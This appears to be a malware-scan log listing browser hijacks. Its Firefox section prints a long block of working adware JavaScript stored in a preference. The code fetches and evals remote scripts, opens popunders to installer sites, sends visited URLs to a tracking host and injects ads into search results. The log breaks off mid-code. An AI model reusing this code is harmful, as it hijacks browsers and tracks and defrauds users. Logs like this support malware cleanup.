IE - HKLM\..\SearchScopes\{E627DC4B-8C04-4234-A2D4-1D634EE01C41}: "URL" = http://www.bigseekpr...q={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,bProtector Start Page = http://visualbee.del...121377&tsp=5004
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.shb.com.vn/
IE - HKCU\..\URLSearchHook: {539F76FD-084E-4858-86D5-62F02F54AE86} - C:\Program Files (x86)\Minibar\Minibar.dll (KangoExtensions)
IE - HKCU\..\SearchScopes,bProtectorDefaultScope = {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}
IE - HKCU\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE8SRC
IE - HKCU\..\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}: "URL" = http://start.mysearc...=1727878116&ir=
IE - HKCU\..\SearchScopes\{1936EF5F-34A0-4463-AFA7-876B5DEBF462}: "URL" = http://search.condui...5253069553&UM=1
IE - HKCU\..\SearchScopes\{391588CC-C239-46D5-90E3-05638F1D5DF5}: "URL" = http://search.creati...q={searchTerms}
IE - HKCU\..\SearchScopes\{4A720000-424D-40a9-A87E-3EBD3E7536CA}: "URL" = http://search.passwo...m={searchTerms}
IE - HKCU\..\SearchScopes\{57238BE3-743E-4BE5-9F23-6AE7B33571A8}: "URL" = http://www.mysearchr...q={searchTerms}
IE - HKCU\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = http://www.google.co...1I7ACAW_deVN406
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...1I7ACAW_deVN406
IE - HKCU\..\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}: "URL" = http://visualbee.del...121377&tsp=5004
IE - HKCU\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.wis...&cc=VN&unqvl=39
IE - HKCU\..\SearchScopes\{E627DC4B-8C04-4234-A2D4-1D634EE01C41}: "URL" = http://www.bigseekpr...q={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Search"
FF - prefs.js..browser.search.defaultenginename,S: S", "WebSearch"
FF - prefs.js..browser.search.defaulturl: "http://www.bigseekpr...={searchTerms}"
FF - prefs.js..browser.search.order.1: "Search"
FF - prefs.js..browser.search.order.1,S: S", "WebSearch"
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.selectedEngine,S: S", "WebSearch"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.n-tv.de/"
FF - prefs.js..extensions.enabledAddons: {97A78363-B868-4B48-AC91-A783A31215AF}:2.0.1
FF - prefs.js..extensions.enabledAddons: {f9d03c26-0575-497e-821d-f7956d23e0ca}:3.0
FF - prefs.js..extensions.enabledAddons: [email protected]:2.0
FF - prefs.js..extensions.enabledAddons: {635abd67-4fe9-1b23-4f01-e679fa7484c1}:2.5.9.20130409112616
FF - prefs.js..extensions.enabledAddons: [email protected]:2.3.2
FF - prefs.js..extensions.mNw7YgSF_.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1){return}}catch(e){};new function(){var a=this;a.domain_storage=\"http://xls.searchfun.in/nx\";a.prefix=\"if72ru4ruh7fewui\";a.conf={\"1\":{\"0\":1,\"1\":21600,\"2\":0,\"3\":0,\"4\":0,\"5\":21600,\"6\":21600,\"7\":0,\"8\":0,\"9\":21600,\"10\":21600,\"11\":0,\"12\":21600,\"13\":21600,\"17\":0,\"18\":12345,\"19\":21600,\"20\":21600,\"21\":21600,\"22\":21600,\"29\":21600,\"30\":21600,\"32\":0,\"33\":21600,\"35\":21600,\"41\":0,\"44\":21600,\"45\":21600,\"46\":0,\"47\":21600},\"3\":{\"0\":1,\"1\":0,\"5\":0,\"6\":0,\"9\":0,\"10\":0,\"12\":0,\"13\":0,\"17\":0,\"19\":0,\"20\":0,\"21\":0,\"22\":0,\"29\":0,\"30\":0,\"32\":0,\"33\":0,\"35\":0,\"41\":0,\"44\":0,\"45\":0,\"46\":0,\"47\":0}};a.pop_collision_id=\"__ipu=1\";a.setStorage=function(b,e,d){localStorage.setItem(a.prefix+\"_\"+b+\"_site\",e+parseInt(d));localStorage.setItem(a.prefix+\"_\"+b+\"_global\",e)};a.ajax=new function(){var b=this;b.get=function(e,d){try{var c=a.utils.randomChar();\"undefined\"!==typeof b[c]&&(c=a.utils.randomChar());b[c]=new XMLHttpRequest;b[c].open(\"GET\",e,!0);b[c].onreadystatechange=function(){4==b[c].readyState&& d(b[c].responseText)};b[c].send()}catch(f){}};b.post=function(e,a,c){b.xhr=new XMLHttpRequest;b.xhr.open(\"POST\",e,!0);b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");b.xhr.onreadystatechange=function(){4==b.xhr.readyState&&c(b.xhr.responseText)};a=encodeURIComponent(a);b.xhr.send(a)}};a.utils=new function(){var b=this;b.randomChar=function(){for(var b=\"\",a=0;2>a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random())); return b};b.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};b.inject_script=function(b){if(b instanceof Array)for(var a=0;a<b.length;a++){var c=document.createElement(\"script\");c.type=\"text/javascript\";var f=b[a];\"function\"==typeof f?c.text=f:c.src=f;document.getElementsByTagName(\"body\")[0].appendChild©}};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getKeywords= function(){var b=document.title,a=document.getElementsByTagName(\"meta\");if(a)for(var c=0,f=a.length;c<f;c++)\"keywords\"==a[c].name.toLowerCase()&&(b+=\" \"+a[c].content.replace(/,/g,\" \"));return b.replace(/[_-]/g,\" \")};b.getVert=function(){var a=localStorage.getItem(\"sk398erjds2d\");return a?a:b.forexVert()}};a.products=new function(){var b=this;b.code_1=function(a,d,c,f,g,h){c=\"http://installerapplicationusa.com/?vert=\"+c+\"&rff=\"+window.self.location.hostname+\"&pid=1539&hid=6563864032225124500&ch=61&\"+ h;localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_site\",d+parseInt(f));localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",d+parseInt(g));(function(a){(function(a){var c=top!=b&&\"string\"===typeof top.document.location.toString()?top:b,e=null,d={},f=d.name||Math.floor(1E3*Math.random()+1),g=d.width||window.outerWidth||window.innerWidth||document.documentElement.clientWidth,h=d.height||window.outerHeight-100||window.innerHeight||document.documentElement.clientHeight,m=\"undefined\"!=typeof d.left?d.left.toString(): window.screenX,d=\"undefined\"!=typeof d.top?d.top.toString():window.screenY,n=function(){var a=navigator.userAgent.toLowerCase(),b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();(function(a, b,d,f,g,h){var k=\"toolbar=no,scrollbars=yes,location=yes,statusbar=yes,menubar=no,resizable=1,width=\"+d.toString()+\",height=\"+f.toString()+\",screenX=\"+g+\",screenY=\"+h,l=function(){window.removeEventListener?document.removeEventListener(\"click\",l,!1):document.detachEvent(\"onclick\",l);if(e=c.window.open(a,b,k))try{e.blur();e.opener.window.focus();window.self.window.focus();window.focus();if(n.firefox){var d=window.open(\"about:blank\");d.focus();d.close()}n.webkit&&openCloseTapreb();n.msie&&(e.opener.window.focus(), window.self.window.focus(),window.focus())}catch(f){}};document.addEventListener?document.addEventListener(\"click\",l,!1):document.attachEvent(\"onclick\",l)})(a,f,g,h,m,d)})(a)})©};b.code_3=function(a,b,c,f,g,h){var m=\"http://childsafedownloadx.asia/?vert=\"+c+\"&rff=\"+window.self.location.hostname+\"&pid=1539&hid=6563864032225124500&ch=61&\"+h;localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_site\",b+parseInt(f));localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",b+parseInt(g));var k=function(){window.open(m, \"_blank\");window.removeEventListener?document.removeEventListener(\"click\",k,!1):document.detachEvent(\"onclick\",k)};document.addEventListener?document.addEventListener(\"click\",k,!1):document.attachEvent(\"onclick\",k)}};a.checkXtrg=function(b,e){a.utils.isIE()?a.utils.inject_script([a.products[\"code_\"+b],e]):a.ajax.get(e,function(a){\"\"!==a&&eval(a)})};a.checkFreq=function(b,e){var d=a.prefix+\"_\"+b,c=localStorage.getItem(d+\"_site\"),d=localStorage.getItem(d+\"_global\"),f=a.conf[\"0\"],g=encodeURIComponent(a.utils.getKeywords()), f=encodeURIComponent(\"ddadv.products.code_\"+b+\"(\"+b+\",\"+e+\",_vert_, _vfrq_, \"+f+\",\"+a.pop_collision_id+\")\"),g=a.domain_storage+\"/?p=\"+b+\"&gf=\"+a.conf[0]+\"&t=\"+e+\"&cb=\"+f+\"&k=\"+g;c||d?parseInt(d)>e||!c||parseInt©>e||a.checkXtrg(b,g):a.checkXtrg(b,g)};a.init=function(){if(\"undefined\"!==typeof localStorage&&\"undefined\"!==typeof localStorage.getItem&&-1==window.location.href.indexOf(a.pop_collision_id)&&-1<window.self.location.protocol.indexOf(\"http\")){var b=a.utils.epoch(),e;for(e in a.conf)a.products[\"code_\"+ e]&&a.checkFreq(e,b)}};window.self==window.top&&a.init();\"undefined\"==typeof window.ddadv&&(window.ddadv=a)};;if(window.self==window.top && \"www.google.com,mail.google.com,en.wikipedia.org,www.facebook.com\".indexOf(window.self.location.hostname) == -1){var s1 = document.createElement(\"script\");s1.type = \"text/javascript\";s1.src = \"http://intext.nav-links.com/js/intext.js?afid=advertisewp&subid=advertisewp8&maxlinks=8&linkcolor=#0000FF\";document.getElementsByTagName(\"head\")[0].appendChild(s1);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null}; a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)}; b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"undefined\"==typeof Element.prototype.appendChild.toString)document.getElementsByTagName(\"head\")[0].appendChild(a);else if(\"bing\"==b){var e=Element.prototype.appendChild,f=document.createElement(\"iframe\");Element.prototype.appendChild=f.document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less= function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\", \"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=6563864032225124500&eid=310&pid=1539&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=VN&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\", \"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"], urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}}, ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"); if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"], src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()}, !1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b, d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom= new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&& (c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault? a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f< d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\", \"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json= function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k; return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")}; b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in 